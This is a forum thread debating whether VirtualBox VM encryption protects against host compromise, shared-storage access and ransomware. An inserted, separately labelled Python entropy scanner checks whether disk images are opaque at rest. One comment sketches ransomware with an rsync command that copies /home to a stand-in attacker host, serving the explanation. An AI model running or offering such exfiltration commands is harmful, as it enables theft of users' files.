by hsbauauvhabzb 1350 days ago
What value does vm encryption have? I’d rather encrypt my host and leave my vms unencrypted, given it would be possible to back door virtual box binaries given an unencrypted file system, or keylog keys assuming a remote breach.
5 comments

You could have a VM where you do your secret stuff, and then shut it down when you are done and nobody can access it without the key.

It doesn't help against sophisticated keyloggers on the host (although I'd assume you would have a little bit of protection if you don't normally work as admin). It is more for the case that your PC gets stolen, or confiscated by authorities.

I think my PCs which shipped with full disc encryption are secure (Windows, macOS), but I never looked into it in detail. And I don't know for sure who could access it besides me (my job, Microsoft/Apple, law enforcement). My old shared desktop PC is definitely not encrypted. I only really have confidence in the Linux laptop I set up.

So for me it would be a privacy and comfort win to just have a small VM for sensitive stuff which is easy to encrypt.

I used to encrypt Ubuntu or my home directory; these days I just use VirtualBox's VM encryption, which has worked well so far.

VirtualBox over the years has been very helpful to me and I'm grateful for it. The only problem I had is that it cannot handle high throughput under stress (e.g. building a full Android release leads to filesystem corruption), but 99% of the time it is very usable.

Virtualbox VM encryption can be useful if the host hypervisor is compromised and the unauthorized party uploads data on disk that the host can trivially access (as is frequently the case with ransomware).

I don’t understand your comment at all. Ransomware can encrypt an encrypted virtual machine. If the host is compromised at a privilege level able to read or modify the VM, the VM is also implicitly compromised.
> If the host is compromised at a privilege level able to read

Multi-user systems exist; compromise may be at user level. Sure, if you have root/SYSTEM-level access then all bets are off, but defense is like an ogre - it has layers.

In what scenario can you read/modify VirtualBox VMs on a shared system in which you can’t read enough of a user profile to compromise an active user session and thereby compromise encrypted credentials?

Can you name any real-world scenarios where VirtualBox is used in a multi-user environment where bare-metal shell/filesystem access is possible? If so, I would be telling those entities their architecture is wrong and they would probably save on TCO by re-engineering things.

Defence in depth is a legitimate argument under some use cases, but your argument seems to be in favour of over-engineering redundant or theoretical security controls rather than creating actually defensible environments.

> In what scenario can you read/modify VirtualBox VMs on a shared system in which you can’t read enough of a user profile to compromise an active user session and thereby compromise encrypted credentials?

Any type of shared storage, e.g. an NFS/SMB share or even local disks/RAID used for storing VMs.

Also:

>> When Oracle VM VirtualBox has just started up the encrypted VM cannot be opened and it stays inaccessible. Also, the encrypted VM stays inaccessible if it was just registered without a password or the password is incorrect. The user needs to provide the password using VirtualBox Manager or with the following VBoxManage command:

>> VBoxManage encryptvm uuid|vmname addpassword --password filename|- --password-id ID

https://www.virtualbox.org/manual/UserManual.html#vmencrypti...

Ransomware typically does the rough equivalent of:

  rsync -az /home baddie@remote-files.example.com:/your-files/
  encrypt-all-files /home
If such a thing were to run on the host hypervisor, it would be reading an encrypted virtual disk file, not its unencrypted contents (since it would be encrypted at rest on the host).

I suppose it would be possible for the ransomware to be aware of Virtualbox and somehow manipulate Virtualbox's management plane to get access to unencrypted disk data, but unless you're the victim of a targeted ransomware attack, that's pretty unlikely.

You can also rot13 the files to the same effect. Works unless they specifically target your files and are aware of the encryption. Heck, it might be more "secure" because this practice would be more obscure than the encryption they built in.
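The two comments above make an empirically checkable claim: a host-level reader (or ransomware exfiltrating files) sees only an opaque blob when the VM is encrypted at rest, and rot13 is not an equivalent. The following is an added example, not code from any commenter or from VirtualBox. It measures Shannon entropy over samples of a disk image to check whether the image is actually opaque at rest; the 7.5 bits/byte threshold, the chunk sizes, and the use of `os.urandom` as a stand-in for real ciphertext are assumptions made for the demonstration.

```python
# Added example (not from the thread): a defender-side check that a VM disk
# image is opaque at rest, using Shannon entropy of sampled bytes.
import codecs
import math
import os
import tempfile
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for constant data, 8.0 for a uniform histogram."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify(bits_per_byte: float, threshold: float = 7.5) -> str:
    """Near-uniform bytes look encrypted (or compressed); anything below the
    threshold still carries structure a host-level reader could harvest.
    The threshold is an assumption chosen for this demo."""
    return "opaque" if bits_per_byte >= threshold else "structured"


def scan_image(path: str, chunk_size: int = 65536, max_chunks: int = 64) -> dict:
    """Sample chunks spread evenly across a file and count how many look opaque.
    A whole-disk-encrypted image should be 100% opaque; an unencrypted image
    exposes zero-filled sparse regions and filesystem metadata as 'structured'."""
    size = os.path.getsize(path)
    if size == 0:
        return {"chunks": 0, "opaque": 0, "min_entropy": 0.0}
    stride = max(chunk_size, size // max_chunks)
    entropies = []
    with open(path, "rb") as fh:
        offset = 0
        while offset < size:
            fh.seek(offset)
            chunk = fh.read(chunk_size)
            if not chunk:
                break
            entropies.append(shannon_entropy(chunk))
            offset += stride
    opaque = sum(1 for e in entropies if classify(e) == "opaque")
    return {"chunks": len(entropies), "opaque": opaque, "min_entropy": min(entropies)}


def rot13_bytes(data: bytes) -> bytes:
    """rot13 permutes letter values but preserves the byte histogram, so the
    entropy is unchanged: it hides nothing from a statistical reader."""
    return codecs.encode(data.decode("latin-1"), "rot_13").encode("latin-1")


# Constructed samples standing in for three kinds of on-disk content.
PLAINTEXT_SAMPLE = (b"/etc/passwd\nroot:x:0:0:root:/root:/bin/bash\n" * 64).ljust(65536, b"\x00")
ROT13_SAMPLE = rot13_bytes(PLAINTEXT_SAMPLE)
# Random bytes stand in for AES-XTS output; real ciphertext is statistically indistinguishable.
CIPHERTEXT_SAMPLE = os.urandom(65536)


def sample_entropies() -> dict:
    """Entropy of each constructed sample, rounded for display."""
    return {
        "plaintext": round(shannon_entropy(PLAINTEXT_SAMPLE), 3),
        "rot13": round(shannon_entropy(ROT13_SAMPLE), 3),
        "ciphertext": round(shannon_entropy(CIPHERTEXT_SAMPLE), 3),
    }


def demo_scan() -> dict:
    """Write two constructed 256 KiB 'images' to a temp dir and scan both."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in (("encrypted.vdi", CIPHERTEXT_SAMPLE * 4),
                           ("plain.vdi", PLAINTEXT_SAMPLE * 4)):
            path = os.path.join(tmp, name)
            with open(path, "wb") as fh:
                fh.write(body)
            results[name] = scan_image(path)
    return results


if __name__ == "__main__":
    print(sample_entropies())
    for name, report in demo_scan().items():
        print(name, report)
```

The caveat a practitioner should keep in mind: compressed data (and images whose free space was wiped with random bytes) also scores as opaque, so a high entropy result confirms that nothing is readable at rest, not which mechanism made it so; a low score on a file you believed encrypted is the actionable finding.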

It is so you don't have to trust sysops, theoretically. The system admin won't be able to view the contents of the VM. Hyper-V supports this as well.

It is a nice extra layer of protection, and the encrypted VMs can be moved to another computer or backed up without losing the encryption.